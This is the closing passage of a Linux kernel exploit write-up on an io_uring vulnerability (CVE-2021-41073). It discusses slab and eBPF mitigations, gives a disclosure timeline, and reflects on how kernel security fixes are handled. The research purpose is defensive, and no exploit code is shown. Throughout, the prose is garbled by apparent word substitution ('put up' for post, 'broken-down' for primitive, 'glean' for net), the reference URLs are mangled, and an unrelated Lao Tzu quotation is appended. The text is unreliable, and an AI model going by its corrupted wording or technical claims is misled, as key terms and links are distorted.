I’ll prove mitigations that offer some protection in opposition to the exploit methods I’ve outlined on this put up, and focus on their effectiveness. I’ll furthermore prove some concerns for the diagram in which forward for Linux kernel hardening.

Existing Mitigations

First I’ll quilt the mitigations for which I’ve already discussed bypasses:

CONFIG_SLAB_FREELIST_RANDOM randomizes the expose whereby buffers derive added to the freelist when a novel slab internet page is allocated. This mitigation is priceless for heap overflow bugs that might maybe maybe rely on contiguous object allocation to be exploitable. Nonetheless, I don’t assume it is in particular efficient for UAF or vulnerabilities giving a controllable free. As Jann Horn notes in this Linux kernel exploitation writeup, in case it’s likely you’ll maybe also management the expose of what gets freed, then you certainly can also management the freelist, and the randomization is nullified [27]. There is a low performance label to this mitigation, because the randomization fully occurs when a novel slab internet page is allocated.

CONFIG_BPF_JIT_ALWAYS_ON eliminates the eBPF interpreter from the kernel. The intent of this mitigation is to lower the volume of usable exploitation objects. While I’ve discussed a quantity of bypasses within the context of this exploit, it’s going to at all times be characteristic if eBPF JIT is enabled. As a mitigation, it comes at no label performance wise and eliminates a likely broken-down for attackers.

Some extra options:

CONFIG_BPF_UNPRIV_DEFAULT_OFF turns off eBPF for unprivileged customers by default. It’ll be modified by assignment of a sysctl knob while the machine is running. Whether this mitigation is acceptable will rely on whether your machine desires to let unprivileged customers experience eBPF applications. If now not, turning off eBPF for unprivileged customers reduces attack surface by manner of exploiting eBPF itself, as wisely as making eBPF unavailable to exhaust as a broken-down, as shown on this exploit. While this mitigation won’t at as soon as impact the exploitability of this vulnerability, it does block a actually precious broken-down. It’ll pressure an attacker to be more ingenious and give you another manner to exhaust kernel execution or be taught/write abilities.

CONFIG_SLAB_FREELIST_HARDENED will compare the if a free object’s metadata is legitimate. This mitigation won’t offer protection to in opposition to any of methods shown on this writeup, however it unquestionably blocks other primitives that might maybe maybe even be built with the vulnerability. Let’s inform, if a kernel buffer is obstructing for a person copy after which freed, the freelist metadata can also be overwritten after the copy is unblocked, and an attacker has management over the pointer of the following free object. This form of freelist management broken-down is blocked by this mitigation, which first assessments whether the free object is de facto within a legitimate slab internet page before allowing it to be allocated. There are some minor performance costs that consist of performing a compare for every freed object.

Future Concerns

Implementing management waft integrity for eBPF applications would block several of the methods discussed on this put up. When an eBPF program is verified and JIT compiled, the official entry level can also be added to a checklist of legitimate targets that is checked before a program is experience. This would possibly block the previously discussed frequent ROP methodology, the JIT smuggling methodology, as wisely because the interpreter methodology (if JIT is turned on).

The subsequent consideration, while now not a mitigation, is a easy however fundamental measure to present a exhaust to software safety. The vulnerability exploited on this put up would admire without complications been found if frequent unit assessments had been written for the IORING_OP_PROVIDE_BUFFERS characteristic. It used to be fully after the 2d exploitable vulnerability on this characteristic used to be reported for any assessments to be committed [32]. Attributable to the like a flash enhance in both machine call enhance and functions of io_uring within the upstream kernel, it is a necessity to exhaust accompanying assessments in bellow that without complications findable vulnerabilities admire this one don’t gallop by.

Security Disclosure Timeline

9/8/2021: I accumulate the vulnerability. I write a PoC to carry out obvious my assumptions are shapely.

9/11/2021: I tell the vulnerability to and fragment the PoC.

9/11/2021:  File is forwarded to io_uring developers and acknowledged.

9/11/2021:  A likely patch is provided.

9/12/2021:  I evaluation and check the patch. I verify it fixes the difficulty. Jens asks me what electronic mail I need to exhaust for my “Reported By Brand”. I reply with my work electronic mail, to which he’s anxious for the reason that area name makes it obvious the patch is a safety tell. I give my inner most electronic mail as an different, which he accepts.

9/13/2021: Greg Ok-H responds to my initial legend that states I need to coordinate disclosure with the linux-distros mailing checklist so downstream patrons can apply the patch. He says since most distros sync on stable releases, it’s now not indispensable to derive the distro checklist eager. I don’t derive the distro checklist eager.

9/13/2021: I apply for a CVE by assignment of Mitre. CVE-2021-41073 is reserved.

9/18/2021: The patch hits upstream and is again ported to affected variations. I ship out a disclosure by assignment of OSS mailing checklist.

Reflection on the Linux Kernel and Security Fixes

First, I used to be impressed with the instant time it took going from initial legend to pushing a repair. It’s no secret that Linux kernel neighborhood can also be seriously caustic to novices, however all americans that I interacted with used to be (mostly) cordial.

The reporting assignment, however, is advanced. The official files is out of date and inconsistent, and it appears all americans that has reported kernel vulnerabilities does so somewhat differently. For essentially the most allotment, all americans emails the linux-distros mailing checklist, and barely a CVE ID is reserved that manner. In my case although, I did now not contact the linux-distro checklist because Greg acknowledged it wasn’t indispensable. Submitting patches is furthermore carried out by assignment of mailing checklist (so, sent by assignment of electronic mail). The total assignment is exhausting to attain, when in contrast to as much as date systems of tell monitoring. This newest weblog put up contains the relevant data that I’d like I had available on the time [29].

One other thing that I realized is the frequent culture spherical safety fixes within the Linux kernel. While here’s nothing novel, I used to be taken aback to look the diagram in which it permeates to a cramped stage [30]. Runt things comparable to editing “Reported by” tags for the reason that electronic mail has “safety” within the area name, or doing away with a CVE identifier from a commit message seem like a general incidence [31]. What’s the relief received by obfuscating a safety tell, in particular, one which already has an assigned CVE?

Exploitable vulnerabilities are patched within the upstream kernel, with out a CVE, or even an acceptable commit message figuring out it as a safety malicious program, your total time. The implications are of this are easy; it has prevented patches for exploitable vulnerabilities from being again ported, and these vulnerabilities are later exploited within the wild [28]. Attackers are friendly of attempting thru commits to build up these hidden vulnerabilities, they usually’re incentivized to entire so. Defenders shouldn’t be stressed with this as wisely.

I bet that for Linux kernel safety to present a exhaust to, an as much as this level, easy files on the correct manner to inform a vulnerability can admire to be agreed upon and released. Additionally, transparency on what patches tackle safety factors will aid prevent downstream patrons from shipping vulnerable software.


At Grapl, safety is in actuality our highest priority. Offensive safety compare is a critical driver for the diagram in which we make our product. With this work, we’ve taken consuming measures to harden our production atmosphere within the following systems:

  1. Establish the set up we need to put into effect boundaries. We don’t rely on the vanilla Linux kernel to place into effect safety boundaries spherical gentle code, pick well-known measures to limit kernel attack surface, and exhaust VMs managed by a restricted Firecracker assignment for isolation. This permits us to vastly lower our trust within the kernel.
  2. Continue to trace and investigate areas of the kernel which might maybe maybe be high attack surface, as we’ve carried out here.
  3. Audit our running machine photos to verify that we’re leveraging all likely mitigations in opposition to methods, admire those described here.


Vitaly Nikolenko, for excellent Linux kernel exploitation compare. I archaic his universal heap spray methodology in my exploit and as a basis for my universal heap leak methodology.

Jann Horn, for excellent Linux kernel exploitation compare. I archaic his compare on schedulers and as wisely as FUSE blockading in my exploit.

Alexander Popov, for excellent Linux kernel exploitation compare. I archaic his compare as a files on easy strategies to assemble this exploit.

Andréa, for her unbelievable work establishing the diagrams on this put up.

Ryota Shiga, for his gentle put up on exploiting io_uring. This put up helped me realize io_uring internals when getting started.

netspooky, for the weblog put up title, edits, and frequent accurate enhance.

Grapl and the Grapl personnel, for supporting this compare.


  1. up/an-introduction-to-the-io-uring-asynchronous-io-framework
  3. https://wjwh.european/posts/2021-10-01-no-syscall-server-iouring.html
  4. https://unixism.glean/loti/what_is_io_uring.html
  5. https://lwn.glean/Articles/810414/
  7. https://unixism.glean/loti/tutorial/sq_poll.html
  8. https://unixism.glean/loti/async_intro.html
  11. https://dwelling windows-and-linux-implementations/
  14. https://lwn.glean/Articles/813311/
  17. page-from-kernels-e-book-tlb-tell.html
  18. https://www.spinics.glean/lists/io-uring/msg09009.html
  29. with-a-patch

Read More



β€œSimplicity, patience, compassion.
These three are your greatest treasures.
Simple in actions and thoughts, you return to the source of being.
Patient with both friends and enemies,
you accord with the way things are.
Compassionate toward yourself,
you reconcile all beings in the world.”
― Lao Tzu, Tao Te Ching